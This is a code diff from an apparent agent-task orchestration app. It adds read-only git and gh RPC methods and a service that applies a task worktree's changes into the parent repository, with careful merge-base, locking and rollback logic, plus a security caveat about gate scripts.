 export type WorktaskRpcMethod = (typeof WORKTASK_RPC_METHODS)[number];
@@ -69,6 +81,18 @@ export type WorktaskRpcMethod = (typeof WORKTASK_RPC_METHODS)[number];
 export interface WorktaskRpcDaemonPort {
   rpc(method: string, params: Record<string, unknown>): Promise<unknown>;
 }
+
+/** Read-only process seam for the git/gh reads (injected in tests). */
+export type WorktaskExec = (cmd: 'git' | 'gh', args: string[], cwd: string) => Promise<GitResult>;
+
+/** `git log` is a listing, and an unbounded one costs the caller's context
+ *  window as much as the daemon's time. */
+export const TASK_GIT_LOG_MAX = 50;
+export const TASK_GIT_LOG_DEFAULT = 20;
+
+/** Field separator for the log format. A unit separator cannot occur in a
+ *  commit subject, so a crafted message cannot break the parse. */
+const LOG_SEP = '\u001f';
 
 export interface WorktaskRpcDeps {
   daemon: WorktaskRpcDaemonPort;
@@ -83,6 +107,8 @@ export interface WorktaskRpcDeps {
   systemWorkspaceId?: string;
   /** Injected for tests; defaults to fs.existsSync. */
   fileExists?: (p: string) => boolean;
+  /** Injected for tests; defaults to the shared argv-only git helper. */
+  exec?: WorktaskExec;
 }
 
 /** Projection task, minimal shape (task.mission.list). */
@@ -202,6 +228,74 @@ async function resolveRepoInfo(worktreePath: string): Promise<{ repoRoot: string
 }
 
 /**
+ * `git`/`gh` with the same contract as the shared git helper: argv only, cwd
+ * fixed, never throws — a non-zero exit is DATA, because "gh is not installed"
+ * and "there is no PR" are answers a caller acts on, not transport failures.
+ */
+async function runGitLike(cmd: 'git' | 'gh', args: string[], cwd: string): Promise<GitResult> {
+  if (cmd === 'git') return runGit(args, cwd);
+  try {
+    const { stdout, stderr } = await execFileAsync(process.platform === 'win32' ? 'gh.exe' : 'gh', args, {
+      cwd,
+      timeout: 20_000,
+      windowsHide: true,
+      maxBuffer: 4 * 1024 * 1024,
+      env: { ...getExecEnv(), GH_PROMPT_DISABLED: '1', GH_PAGER: 'cat', NO_COLOR: '1' },
+    });
+    return { stdout, stderr, code: 0 };
+  } catch (e) {
+    const err = e as { stdout?: string; stderr?: string; code?: number };
+    return { stdout: err.stdout ?? '', stderr: err.stderr ?? String(e), code: typeof err.code === 'number' ? err.code : 1 };
+  }
+}
+
+/** `git status --porcelain=v1 --branch` → structured. The first line is the
+ *  branch header; every other line is `XY <path>`. Renames carry ` -> `, and
+ *  the destination is the path that matters to a reader. */
+export function parseGitStatus(stdout: string): {
+  branch: string;
+  ahead: number;
+  behind: number;
+  clean: boolean;
+  files: { status: string; path: string }[];
+} {
+  const lines = stdout.split('\n').filter((l) => l.length > 0);
+  let branch = '';
+  let ahead = 0;
+  let behind = 0;
+  const files: { status: string; path: string }[] = [];
+  for (const line of lines) {
+    if (line.startsWith('## ')) {
+      const header = line.slice(3);
+      const nameEnd = header.indexOf(' [');
+      const name = nameEnd === -1 ? header : header.slice(0, nameEnd);
+      branch = name.split('...')[0]?.trim() ?? '';
+      const aheadMatch = /ahead (\d+)/.exec(header);
+      const behindMatch = /behind (\d+)/.exec(header);
+      ahead = aheadMatch ? Number(aheadMatch[1]) : 0;
+      behind = behindMatch ? Number(behindMatch[1]) : 0;
+      continue;
+    }
+    const status = line.slice(0, 2);
+    const rest = line.slice(3);
+    const arrow = rest.indexOf(' -> ');
+    files.push({ status, path: arrow === -1 ? rest : rest.slice(arrow + 4) });
+  }
+  return { branch, ahead, behind, clean: files.length === 0, files };
+}
+
+/** The `%H\x1f%an\x1f%aI\x1f%s` lines `task.git.log` asks for. */
+export function parseGitLog(stdout: string): { hash: string; author: string; date: string; subject: string }[] {
+  return stdout
+    .split('\n')
+    .filter((l) => l.length > 0)
+    .map((line) => {
+      const [hash = '', author = '', date = '', subject = ''] = line.split('\u001f');
+      return { hash, author, date, subject };
+    });
+}
+
+/**
  * Register the task-lifecycle pipe methods. `close`, `pr` and `gate` MUST be
  * the same service instances the renderer IPC handler uses — TaskWorktreeManager
  * keeps a per-repo mutex chain, and two instances would race for git's
@@ -214,6 +308,10 @@ async function resolveRepoInfo(worktreePath: string): Promise<{ repoRoot: string
 export function registerWorktaskRpc(router: RpcRouter, deps: WorktaskRpcDeps): void {
   const systemWorkspaceId = deps.systemWorkspaceId ?? 'ws-daemon';
   const fileExists = deps.fileExists ?? ((p: string) => fs.existsSync(p));
+  // `gh` rides the same argv-only helper as git — no shell, no interpolation.
+  // Only non-interactive read subcommands are used, so there is no prompt to
+  // disable.
+  const exec: WorktaskExec = deps.exec ?? ((cmd, args, cwd) => runGitLike(cmd, args, cwd));
   const register = (method: WorktaskRpcMethod, handler: Parameters<RpcRouter['register']>[1]): void =>
     router.register(method as unknown as RpcMethod, handler);
 
@@ -317,5 +415,88 @@ export function registerWorktaskRpc(router: RpcRouter, deps: WorktaskRpcDeps): v
       title: task.title,
       ...(body !== undefined ? { body } : {}),
     });
+  });
+
+  // ── task.git.status ──────────────────────────────────────────────────
+  // Read-only, and the reason the destructive methods above can be terse: a
+  // brain that can SEE a task's worktree state stops guessing at it from pane
+  // screens, and stops calling task.close to find out whether it was dirty.
+  register('task.git.status', async (params, ctx?: RpcContext) => {
+    const blocked = localOnly(ctx, 'task.git.status');
+    if (blocked) return blocked;
+    const owned = await resolveOwnedTask(deps, params, ctx);
+    if (!('task' in owned)) return deny(owned.code, owned.message);
+    const { task } = owned;
+    if (!task.worktreePath || !fileExists(task.worktreePath)) {
+      return deny('FAILED_PRECONDITION', `task '${task.id}' has no worktree on disk`);
+    }
+    const res = await exec('git', ['status', '--porcelain=v1', '--branch'], task.worktreePath);
+    if (res.code !== 0) {
+      return { ok: false as const, taskId: task.id, reason: 'git-failed' as const, error: res.stderr.trim() };
+    }
+    return { ok: true as const, taskId: task.id, worktreePath: task.worktreePath, ...parseGitStatus(res.stdout) };
+  });
+
+  // ── task.git.log ─────────────────────────────────────────────────────
+  register('task.git.log', async (params, ctx?: RpcContext) => {
+    const blocked = localOnly(ctx, 'task.git.log');
+    if (blocked) return blocked;
+    const owned = await resolveOwnedTask(deps, params, ctx);
+    if (!('task' in owned)) return deny(owned.code, owned.message);
+    const { task } = owned;
+    if (!task.worktreePath || !fileExists(task.worktreePath)) {
+      return deny('FAILED_PRECONDITION', `task '${task.id}' has no worktree on disk`);
+    }
+    const raw = params['limit'];
+    if (raw !== undefined && (typeof raw !== 'number' || !Number.isInteger(raw) || raw < 1)) {
+      return deny('INVALID_ARGUMENT', 'limit must be a positive integer');
+    }
+    // Clamped rather than rejected at the top end: a caller asking for 500
+    // commits wants "as many as I can have", and refusing the whole call helps
+    // nobody. The number that actually ran is reported back.
+    const limit = Math.min(typeof raw === 'number' ? raw : TASK_GIT_LOG_DEFAULT, TASK_GIT_LOG_MAX);
+    const res = await exec(
+      'git',
+      ['log', `-n`, String(limit), `--format=%H${LOG_SEP}%an${LOG_SEP}%aI${LOG_SEP}%s`],
+      task.worktreePath,
+    );
+    if (res.code !== 0) {
+      return { ok: false as const, taskId: task.id, reason: 'git-failed' as const, error: res.stderr.trim() };
+    }
+    return { ok: true as const, taskId: task.id, limit, commits: parseGitLog(res.stdout) };
+  });
+
+  // ── task.gh.prView ───────────────────────────────────────────────────
+  // Errors as DATA: `gh` missing, unauthenticated, or simply no PR for this
+  // branch are all things a caller acts on, and turning them into a transport
+  // error would make "there is no PR yet" indistinguishable from "the call
+  // broke".
+  register('task.gh.prView', async (params, ctx?: RpcContext) => {
+    const blocked = localOnly(ctx, 'task.gh.prView');
+    if (blocked) return blocked;
+    const owned = await resolveOwnedTask(deps, params, ctx);
+    if (!('task' in owned)) return deny(owned.code, owned.message);
+    const { task } = owned;
+    if (!task.worktreePath || !fileExists(task.worktreePath)) {
+      return deny('FAILED_PRECONDITION', `task '${task.id}' has no worktree on disk`);
+    }
+    const res = await exec(
+      'gh',
+      ['pr', 'view', '--json', 'number,title,state,url,isDraft,headRefName,mergeStateStatus'],
+      task.worktreePath,
+    );
+    if (res.code !== 0) {
+      return {
+        ok: false as const,
+        taskId: task.id,
+        reason: 'no-pr' as const,
+        error: res.stderr.trim() || 'gh could not report a pull request for this branch',
+      };
+    }
+    try {
+      return { ok: true as const, taskId: task.id, pr: JSON.parse(res.stdout) as unknown };
+    } catch {
+      return { ok: false as const, taskId: task.id, reason: 'gh-failed' as const, error: 'gh returned unparseable JSON' };
+    }
   });
 }

--- a/src/main/worktask/TaskAdoptService.ts
+++ b/src/main/worktask/TaskAdoptService.ts
@@ -1,0 +1,170 @@
+// ─── TaskAdoptService — take a task's whole result into the parent checkout ───
+//
+// The GUI already has an adopt path: read a task worktree's diff, tick the hunks
+// you want, apply them into the parent. That is a HUMAN loop — it exists so a
+// person can take three of five files. An orchestrator brain does not select
+// hunks; it decides "this task's work is good, land it", and the only thing it
+// was missing was a task-level verb for that. So hunk selection stays in the
+// GUI and this service is the all-or-nothing sibling of it.
+//
+// Guarantees, all of them argv (no shell, no caller string ever reaches git):
+//   - The target is DERIVED — the parent repository of the task's own worktree,
+//     never a path the caller names.
+//   - The target must be clean. Applying a patch on top of uncommitted work
+//     mixes two authors' edits into one unreviewable pile, and `git apply` gives
+//     no way back once it half-succeeds.
+//   - The patch is taken against the parent's CURRENT HEAD, so what lands is
+//     exactly the difference between what the parent has and what the task
+//     produced — committed and uncommitted alike.
+//   - Applied with --3way and left UNSTAGED: adopting is not committing. The
+//     human (or the brain, with a commit of its own) still decides.
+
+import * as fs from 'node:fs';
+import * as os from 'node:os';
+import * as path from 'node:path';
+import * as crypto from 'node:crypto';
+
+import { git as runGit, type GitResult } from '../git/git';
+
+/** Injectable git (same seam shape as TaskPrService.exec). */
+export type AdoptGit = (args: string[], cwd: string) => Promise<GitResult>;
+
+export interface TaskAdoptServiceOptions {
+  git?: AdoptGit;
+  /** Injected for tests; defaults to a temp file under os.tmpdir(). */
+  writePatch?: (patch: string) => string;
+  removePatch?: (file: string) => void;
+}
+
+export interface AdoptTaskInput {
+  taskId: string;
+  worktreePath: string;
+}
+
+export type AdoptTaskResult =
+  | {
+      ok: true;
+      taskId: string;
+      /** Repository the changes landed in. */
+      targetRepo: string;
+      /** Paths the patch touched, as git reported them. */
+      files: string[];
+    }
+  | {
+      ok: false;
+      taskId: string;
+      reason: 'no-repo' | 'not-a-task-worktree' | 'dirty-target' | 'empty' | 'apply-failed' | 'error';
+      error: string;
+    };
+
+export class TaskAdoptService {
+  private readonly git: AdoptGit;
+  private readonly writePatch: (patch: string) => string;
+  private readonly removePatch: (file: string) => void;
+
+  constructor(opts: TaskAdoptServiceOptions = {}) {
+    this.git = opts.git ?? runGit;
+    this.writePatch =
+      opts.writePatch ??
+      ((patch) => {
+        const file = path.join(os.tmpdir(), `wmux-adopt-${crypto.randomBytes(8).toString('hex')}.patch`);
+        fs.writeFileSync(file, patch, 'utf8');
+        return file;
+      });
+    this.removePatch =
+      opts.removePatch ??
+      ((file) => {
+        try {
+          fs.unlinkSync(file);
+        } catch {
+          // Best effort — a leftover temp patch is not worth an error path.
+        }
+      });
+  }
+
+  async adopt(input: AdoptTaskInput): Promise<AdoptTaskResult> {
+    const { taskId, worktreePath } = input;
+
+    // ── The target, derived ──────────────────────────────────────────────
+    const commonDir = await this.git(['rev-parse', '--path-format=absolute', '--git-common-dir'], worktreePath);
+    if (commonDir.code !== 0 || commonDir.stdout.trim().length === 0) {
+      return { ok: false, taskId, reason: 'no-repo', error: 'the task worktree is not inside a git repository' };
+    }
+    const top = await this.git(['rev-parse', '--show-toplevel'], path.dirname(commonDir.stdout.trim()));
+    const targetRepo = top.code === 0 ? top.stdout.trim() : '';
+    if (!targetRepo) {
+      return { ok: false, taskId, reason: 'no-repo', error: "the task worktree's parent repository could not be resolved" };
+    }
+    if (path.resolve(targetRepo) === path.resolve(worktreePath)) {
+      // The task is the main checkout, not a worktree of it — there is nothing
+      // to adopt INTO, and applying a repo's own diff onto itself is a no-op at
+      // best and a corruption at worst.
+      return {
+        ok: false,
+        taskId,
+        reason: 'not-a-task-worktree',
+        error: 'this task runs in the main checkout, not in a worktree of it, so there is no parent to adopt into',
+      };
+    }
+
+    // ── The target must be clean ─────────────────────────────────────────
+    const status = await this.git(['status', '--porcelain'], targetRepo);
+    if (status.code !== 0) {
+      return { ok: false, taskId, reason: 'error', error: `git status failed in ${targetRepo}: ${status.stderr.trim()}` };
+    }
+    if (status.stdout.trim().length > 0) {
+      return {
+        ok: false,
+        taskId,
+        reason: 'dirty-target',
+        error:
+          `${targetRepo} has uncommitted changes; adopting on top of them would mix two authors' edits ` +
+          'into one unreviewable state. Commit or stash there first.',
+      };
+    }
+
+    const head = await this.git(['rev-parse', 'HEAD'], targetRepo);
+    const base = head.code === 0 ? head.stdout.trim() : '';
+    if (!base) {
+      return { ok: false, taskId, reason: 'error', error: `${targetRepo} has no HEAD commit to adopt against` };
+    }
+
+    // ── The patch ────────────────────────────────────────────────────────
+    // `add -N` so files the task CREATED are in the diff at all. It touches the
+    // task's index and nothing else — no content is staged, and the task's own
+    // commits are unaffected.
+    await this.git(['add', '-A', '-N'], worktreePath);
+    const diff = await this.git(['diff', '--binary', base], worktreePath);
+    if (diff.code !== 0) {
+      return { ok: false, taskId, reason: 'error', error: `git diff failed in the task worktree: ${diff.stderr.trim()}` };
+    }
+    if (diff.stdout.trim().length === 0) {
+      return {
+        ok: false,
+        taskId,
+        reason: 'empty',
+        error: 'this task has produced no changes against the parent repository, so there is nothing to adopt',
+      };
+    }
+    const names = await this.git(['diff', '--name-only', base], worktreePath);
+    const files = names.stdout.split('\n').map((l) => l.trim()).filter((l) => l.length > 0);
+
+    // ── Apply, unstaged ──────────────────────────────────────────────────
+    const patchFile = this.writePatch(diff.stdout);
+    try {
+      const applied = await this.git(['apply', '--3way', '--whitespace=nowarn', patchFile], targetRepo);
+      if (applied.code !== 0) {
+        return {
+          ok: false,
+          taskId,
+          reason: 'apply-failed',
+          error: `the task's changes did not apply cleanly to ${targetRepo}: ${applied.stderr.trim()}`,
+        };
+      }
+    } finally {
+      this.removePatch(patchFile);
+    }
+
+    return { ok: true, taskId, targetRepo, files };
+  }
+}

--- a/src/main/worktask/TaskAdoptService.ts
+++ b/src/main/worktask/TaskAdoptService.ts
@@ -7,39 +7,97 @@
 // was missing was a task-level verb for that. So hunk selection stays in the
 // GUI and this service is the all-or-nothing sibling of it.
 //
-// Guarantees, all of them argv (no shell, no caller string ever reaches git):
-//   - The target is DERIVED — the parent repository of the task's own worktree,
-//     never a path the caller names.
-//   - The target must be clean. Applying a patch on top of uncommitted work
-//     mixes two authors' edits into one unreviewable pile, and `git apply` gives
-//     no way back once it half-succeeds.
-//   - The patch is taken against the parent's CURRENT HEAD, so what lands is
-//     exactly the difference between what the parent has and what the task
-//     produced — committed and uncommitted alike.
-//   - Applied with --3way and left UNSTAGED: adopting is not committing. The
-//     human (or the brain, with a commit of its own) still decides.
+// Everything below is argv only — no shell, and no caller string ever reaches
+// git. The four properties that took a review round to get right:
+//
+//   THE BASE IS THE MERGE BASE, NOT THE PARENT'S HEAD. Diffing against the
+//   parent's current HEAD makes every commit the parent has and the task does
+//   not appear in the patch as a REVERSAL. Adopt task 1, commit it, adopt task
+//   2 — and task 1's work is silently deleted, because task 2's worktree was
+//   branched before it. `merge-base` is the last commit both sides share, so
+//   the patch contains the task's changes and nothing else.
+//
+//   THE TARGET IS NEVER LEFT HALF-APPLIED. `git apply --3way` writes files as
+//   it goes and can stop in the middle with conflict markers on disk. So the
+//   patch is validated with `--check` first, and if the real apply still fails
+//   the touched paths are restored (`checkout` + `reset`) before returning.
+//
+//   WHAT LANDS IS STAGED, NEVER COMMITTED. `git apply --3way` needs the index
+//   to do its merge, so the adopted changes arrive staged — `git diff --cached`
+//   in the parent is exactly what was taken. Nothing is committed and nothing
+//   is pushed; the human (or the brain, with a commit of its own) still decides.
+//
+//   THE TASK'S INDEX IS NOT TOUCHED. Untracked files only appear in a diff
+//   after `git add -N`, which would leave intent-to-add entries in the index of
+//   a worktree an agent is still working in. The add and the diff run against a
+//   TEMPORARY index (GIT_INDEX_FILE) that is deleted afterwards.
+//
+//   ADOPTS ARE SERIALIZED PER TARGET REPOSITORY. The clean check and the apply
+//   are separated by several git invocations; two concurrent adopts would both
+//   see a clean tree and the second would apply onto the first's output.
 
 import * as fs from 'node:fs';
 import * as os from 'node:os';
 import * as path from 'node:path';
-import * as crypto from 'node:crypto';
+import { execFile } from 'node:child_process';
+import { promisify } from 'node:util';
 
-import { git as runGit, type GitResult } from '../git/git';
+import { getExecEnv } from '../../shared/execEnv';
+import type { GitResult } from '../git/git';
 
-/** Injectable git (same seam shape as TaskPrService.exec). */
-export type AdoptGit = (args: string[], cwd: string) => Promise<GitResult>;
+const execFileAsync = promisify(execFile);
+
+/** Injectable git. `env` carries GIT_INDEX_FILE for the temp-index steps. */
+export type AdoptGit = (
+  args: string[],
+  cwd: string,
+  env?: Record<string, string>,
+) => Promise<GitResult>;
+
+/** Default git: argv only, cwd fixed, never throws — a non-zero exit is data
+ *  the caller branches on, exactly like the shared helper. */
+const defaultGit: AdoptGit = async (args, cwd, env) => {
+  try {
+    const { stdout, stderr } = await execFileAsync('git', args, {
+      cwd,
+      timeout: 60_000,
+      windowsHide: true,
+      maxBuffer: 64 * 1024 * 1024,
+      env: { ...getExecEnv(), ...(env ?? {}) },
+    });
+    return { stdout, stderr, code: 0 };
+  } catch (e) {
+    const err = e as { stdout?: string; stderr?: string; code?: number };
+    return {
+      stdout: err.stdout ?? '',
+      stderr: err.stderr ?? String(e),
+      code: typeof err.code === 'number' ? err.code : 1,
+    };
+  }
+};
 
 export interface TaskAdoptServiceOptions {
   git?: AdoptGit;
-  /** Injected for tests; defaults to a temp file under os.tmpdir(). */
+  /** Injected for tests; defaults to a 0600 file in a private temp directory. */
   writePatch?: (patch: string) => string;
   removePatch?: (file: string) => void;
+  /** Injected for tests; defaults to mkdtemp + rm. */
+  makeTempIndex?: () => { indexFile: string; cleanup: () => void };
 }
 
 export interface AdoptTaskInput {
   taskId: string;
   worktreePath: string;
 }
+
+export type AdoptFailureReason =
+  | 'no-repo'
+  | 'not-a-task-worktree'
+  | 'dirty-target'
+  | 'empty'
+  | 'needs_rebase'
+  | 'conflict'
+  | 'error';
 
 export type AdoptTaskResult =
   | {
@@ -49,36 +107,90 @@ export type AdoptTaskResult =
       targetRepo: string;
       /** Paths the patch touched, as git reported them. */
       files: string[];
+      /** The merge base the patch was taken against. */
+      base: string;
     }
   | {
       ok: false;
       taskId: string;
-      reason: 'no-repo' | 'not-a-task-worktree' | 'dirty-target' | 'empty' | 'apply-failed' | 'error';
+      reason: AdoptFailureReason;
       error: string;
+      /** For `conflict`: the paths that could not be applied. */
+      files?: string[];
     };
+
+/** `--porcelain=v1 -z` output → entries. NUL-framed because a path may contain
+ *  a newline, and `-z` also stops git quoting non-ASCII names — a line parse
+ *  reported `"src/\303\251.ts"` as a path that does not exist. Rename entries
+ *  are TWO records (destination first, then origin), so the origin record is
+ *  consumed with the rename that owns it. */
+export function parsePorcelainZ(stdout: string): { status: string; path: string }[] {
+  const records = stdout.split('\0');
+  const out: { status: string; path: string }[] = [];
+  for (let i = 0; i < records.length; i++) {
+    const rec = records[i];
+    if (!rec || rec.length < 4) continue;
+    const status = rec.slice(0, 2);
+    out.push({ status, path: rec.slice(3) });
+    // R/C carry their source path in the next record.
+    if (status[0] === 'R' || status[0] === 'C') i += 1;
+  }
+  return out;
+}
 
 export class TaskAdoptService {
   private readonly git: AdoptGit;
   private readonly writePatch: (patch: string) => string;
   private readonly removePatch: (file: string) => void;
+  private readonly makeTempIndex: () => { indexFile: string; cleanup: () => void };
+  /**
+   * One promise chain per target repository. The clean check and the apply are
+   * several git calls apart, so without this two adopts landing at once both
+   * observe a clean tree and the second writes on top of the first's result —
+   * and neither operator sees a conflict, because there is no conflict: the
+   * patches simply merge into one unreviewable state.
+   *
+   * In-process only, and that is the honest scope: the GUI's own apply path and
+   * a second wmux instance are not covered. It closes the window this service
+   * creates (a brain adopting N tasks in a loop), not every window that exists.
+   */
+  private readonly repoLocks = new Map<string, Promise<unknown>>();
 
   constructor(opts: TaskAdoptServiceOptions = {}) {
-    this.git = opts.git ?? runGit;
+    this.git = opts.git ?? defaultGit;
     this.writePatch =
       opts.writePatch ??
       ((patch) => {
-        const file = path.join(os.tmpdir(), `wmux-adopt-${crypto.randomBytes(8).toString('hex')}.patch`);
-        fs.writeFileSync(file, patch, 'utf8');
+        // Private directory + 0600: the patch is the task's entire diff, and
+        // os.tmpdir() is world-readable on every platform this ships on.
+        const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'wmux-adopt-'));
+        const file = path.join(dir, 'task.patch');
+        fs.writeFileSync(file, patch, { mode: 0o600 });
         return file;
       });
     this.removePatch =
       opts.removePatch ??
       ((file) => {
         try {
-          fs.unlinkSync(file);
+          fs.rmSync(path.dirname(file), { recursive: true, force: true });
         } catch {
           // Best effort — a leftover temp patch is not worth an error path.
         }
+      });
+    this.makeTempIndex =
+      opts.makeTempIndex ??
+      (() => {
+        const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'wmux-adopt-index-'));
+        return {
+          indexFile: path.join(dir, 'index'),
+          cleanup: () => {
+            try {
+              fs.rmSync(dir, { recursive: true, force: true });
+            } catch {
+              // Best effort.
+            }
+          },
+        };
       });
   }
 
@@ -107,12 +219,33 @@ export class TaskAdoptService {
       };
     }
 
+    return this.withRepoLock(targetRepo, () => this.applyInto(taskId, worktreePath, targetRepo));
+  }
+
+  /** Serialize on the target repo, and never let one adopt's failure poison the
+   *  chain for the next. */
+  private withRepoLock<T>(repo: string, work: () => Promise<T>): Promise<T> {
+    const key = path.resolve(repo);
+    const prior = this.repoLocks.get(key) ?? Promise.resolve();
+    const run = prior.then(work, work);
+    // Swallow on the CHAIN only; the returned promise still rejects normally.
+    this.repoLocks.set(
+      key,
+      run.then(
+        () => undefined,
+        () => undefined,
+      ),
+    );
+    return run;
+  }
+
+  private async applyInto(taskId: string, worktreePath: string, targetRepo: string): Promise<AdoptTaskResult> {
     // ── The target must be clean ─────────────────────────────────────────
-    const status = await this.git(['status', '--porcelain'], targetRepo);
+    const status = await this.git(['status', '--porcelain=v1', '-z'], targetRepo);
     if (status.code !== 0) {
       return { ok: false, taskId, reason: 'error', error: `git status failed in ${targetRepo}: ${status.stderr.trim()}` };
     }
-    if (status.stdout.trim().length > 0) {
+    if (parsePorcelainZ(status.stdout).length > 0) {
       return {
         ok: false,
         taskId,
@@ -123,48 +256,121 @@ export class TaskAdoptService {
       };
     }
 
-    const head = await this.git(['rev-parse', 'HEAD'], targetRepo);
-    const base = head.code === 0 ? head.stdout.trim() : '';
-    if (!base) {
+    // ── The base: what the two sides SHARE ───────────────────────────────
+    const parentHead = await this.git(['rev-parse', 'HEAD'], targetRepo);
+    const taskHead = await this.git(['rev-parse', 'HEAD'], worktreePath);
+    if (parentHead.code !== 0 || parentHead.stdout.trim().length === 0) {
       return { ok: false, taskId, reason: 'error', error: `${targetRepo} has no HEAD commit to adopt against` };
     }
-
-    // ── The patch ────────────────────────────────────────────────────────
-    // `add -N` so files the task CREATED are in the diff at all. It touches the
-    // task's index and nothing else — no content is staged, and the task's own
-    // commits are unaffected.
-    await this.git(['add', '-A', '-N'], worktreePath);
-    const diff = await this.git(['diff', '--binary', base], worktreePath);
-    if (diff.code !== 0) {
-      return { ok: false, taskId, reason: 'error', error: `git diff failed in the task worktree: ${diff.stderr.trim()}` };
+    if (taskHead.code !== 0 || taskHead.stdout.trim().length === 0) {
+      return { ok: false, taskId, reason: 'error', error: 'the task worktree has no HEAD commit' };
     }
-    if (diff.stdout.trim().length === 0) {
+    const mergeBase = await this.git(
+      ['merge-base', parentHead.stdout.trim(), taskHead.stdout.trim()],
+      targetRepo,
+    );
+    const base = mergeBase.code === 0 ? mergeBase.stdout.trim() : '';
+    if (!base) {
+      // No shared commit: the task branched from something this repository no
+      // longer contains (a rewritten base, a force-push, an unrelated history).
+      // Any patch we could build would delete work rather than add it.
       return {
         ok: false,
         taskId,
-        reason: 'empty',
-        error: 'this task has produced no changes against the parent repository, so there is nothing to adopt',
+        reason: 'needs_rebase',
+        error:
+          `the task and ${targetRepo} share no common commit, so the task's changes cannot be expressed as a patch ` +
+          'against this repository — rebase the task branch onto the current base and adopt again',
       };
     }
-    const names = await this.git(['diff', '--name-only', base], worktreePath);
-    const files = names.stdout.split('\n').map((l) => l.trim()).filter((l) => l.length > 0);
 
-    // ── Apply, unstaged ──────────────────────────────────────────────────
-    const patchFile = this.writePatch(diff.stdout);
+    // ── The patch, built against a TEMPORARY index ───────────────────────
+    // `add -N` is what makes new files appear in a diff at all, and doing it in
+    // the task's real index leaves intent-to-add entries in a worktree an agent
+    // is still using (its next `git status` reads differently, and its own
+    // commit picks up files it never staged).
+    const temp = this.makeTempIndex();
+    const env = { GIT_INDEX_FILE: temp.indexFile };
+    let patch: string;
+    let files: string[];
     try {
-      const applied = await this.git(['apply', '--3way', '--whitespace=nowarn', patchFile], targetRepo);
-      if (applied.code !== 0) {
+      const seed = await this.git(['read-tree', taskHead.stdout.trim()], worktreePath, env);
+      if (seed.code !== 0) {
+        return { ok: false, taskId, reason: 'error', error: `could not seed a temporary index: ${seed.stderr.trim()}` };
+      }
+      const added = await this.git(['add', '-A', '-N'], worktreePath, env);
+      if (added.code !== 0) {
         return {
           ok: false,
           taskId,
-          reason: 'apply-failed',
-          error: `the task's changes did not apply cleanly to ${targetRepo}: ${applied.stderr.trim()}`,
+          reason: 'error',
+          error: `could not stage the task's new files for diffing: ${added.stderr.trim()}`,
+        };
+      }
+      const diff = await this.git(['diff', '--binary', base], worktreePath, env);
+      if (diff.code !== 0) {
+        return { ok: false, taskId, reason: 'error', error: `git diff failed in the task worktree: ${diff.stderr.trim()}` };
+      }
+      if (diff.stdout.trim().length === 0) {
+        return {
+          ok: false,
+          taskId,
+          reason: 'empty',
+          error: 'this task has produced no changes against the shared base, so there is nothing to adopt',
+        };
+      }
+      patch = diff.stdout;
+      const names = await this.git(['diff', '--name-only', '-z', base], worktreePath, env);
+      files = names.stdout.split('\0').map((l) => l.trim()).filter((l) => l.length > 0);
+    } finally {
+      temp.cleanup();
+    }
+
+    // ── Validate, then apply, then restore on failure ────────────────────
+    const patchFile = this.writePatch(patch);
+    try {
+      const check = await this.git(['apply', '--check', '--3way', '--whitespace=nowarn', patchFile], targetRepo);
+      if (check.code !== 0) {
+        // Nothing has been written yet — this is the cheap, safe refusal.
+        return {
+          ok: false,
+          taskId,
+          reason: 'conflict',
+          error: `the task's changes do not apply cleanly to ${targetRepo}: ${check.stderr.trim()}`,
+          files,
+        };
+      }
+      const applied = await this.git(['apply', '--3way', '--whitespace=nowarn', patchFile], targetRepo);
+      if (applied.code !== 0) {
+        // --check passed and the real apply still failed, so the tree may be
+        // half-written with conflict markers in it. Put the touched paths back
+        // rather than handing back a repository nobody asked for.
+        await this.restore(targetRepo, files);
+        return {
+          ok: false,
+          taskId,
+          reason: 'conflict',
+          error:
+            `the task's changes failed to apply to ${targetRepo} and the affected paths were restored: ` +
+            applied.stderr.trim(),
+          files,
         };
       }
     } finally {
       this.removePatch(patchFile);
     }
 
-    return { ok: true, taskId, targetRepo, files };
+    return { ok: true, taskId, targetRepo, files, base };
+  }
+
+  /** Undo a half-applied patch: unstage anything `--3way` staged, then restore
+   *  the working copies. Limited to the patch's own paths so unrelated state in
+   *  the repository is never touched. */
+  private async restore(targetRepo: string, files: string[]): Promise<void> {
+    if (files.length === 0) return;
+    await this.git(['reset', '-q', '--', ...files], targetRepo);
+    await this.git(['checkout', '--', ...files], targetRepo);
+    // A file the patch CREATED has nothing to check out; remove the leftovers.
+    await this.git(['clean', '-qfd', '--', ...files], targetRepo);
   }
 }

--- a/src/main/worktask/TaskGateRunner.ts
+++ b/src/main/worktask/TaskGateRunner.ts
@@ -7,9 +7,9 @@
 // structured verdict into the task ledger, so `completed` means a gate passed
 // rather than a worker having said so.
 //
-// What it is NOT: a shell. There is no caller-supplied command anywhere in this
-// file. The only three argv arrays it will ever spawn are ALLOWED_GATE_ARGV
-// below, chosen by the runner from what the project itself declares:
+// The caller supplies no command. The only argv arrays this file will ever
+// spawn are `allowedGateArgv()`, chosen by the runner from what the project
+// itself declares:
 //
 //   1. `scripts/verify.sh` — ONLY when the project's `wmux.json` is currently
 //      TRUSTED (ProjectConfigStore verdict, i.e. the user approved these exact
@@ -19,6 +19,26 @@
 //      believes it declared its own gate is never silently graded by another.
 //   2. otherwise `npm run lint`, then `npm test` — each only if package.json
 //      actually declares that script. Sequential, first failure stops.
+//
+// ── WHAT THIS IS NOT: A SANDBOX ─────────────────────────────────────────────
+//
+// The allow-list constrains WHICH script runs. It does not constrain what that
+// script DOES, and it cannot: `scripts/verify.sh` and the `lint`/`test` entries
+// in package.json are files inside the task worktree, which is exactly the tree
+// the worker has been editing. Running the gate therefore executes code the
+// worker controls, in a daemon-spawned process, with the daemon's own user,
+// environment and filesystem access — the same privileges any pane agent
+// already has, but reached without a pane and without a permission prompt.
+//
+// Two consequences that must not be forgotten by anyone reading this file:
+//   * A gate run is not a safe way to inspect an untrusted worktree. Do not
+//     expose it on a surface where the caller is less trusted than the person
+//     who could have typed `npm test` in that directory themselves.
+//   * The `command` recorded in the ledger names the script, not its content,
+//     and the `tail` is whatever that script printed. Both are untrusted.
+//
+// The trust check on `wmux.json` is therefore about which of two GATES the
+// project picked, never about whether the code being graded is safe to run.
 //
 // `node_modules` missing (or a symlink, which is how worktrees in this repo get
 // a false `npm test` failure) is reported as `skipped: 'deps_missing'`, never as
@@ -94,13 +114,20 @@ export function allowedGateArgv(worktreePath: string): readonly (readonly string
 
 // ── Injected seams ───────────────────────────────────────────────────────────
 
+/**
+ * How a gate step ended. `exited` carries the process's own exit code (`null`
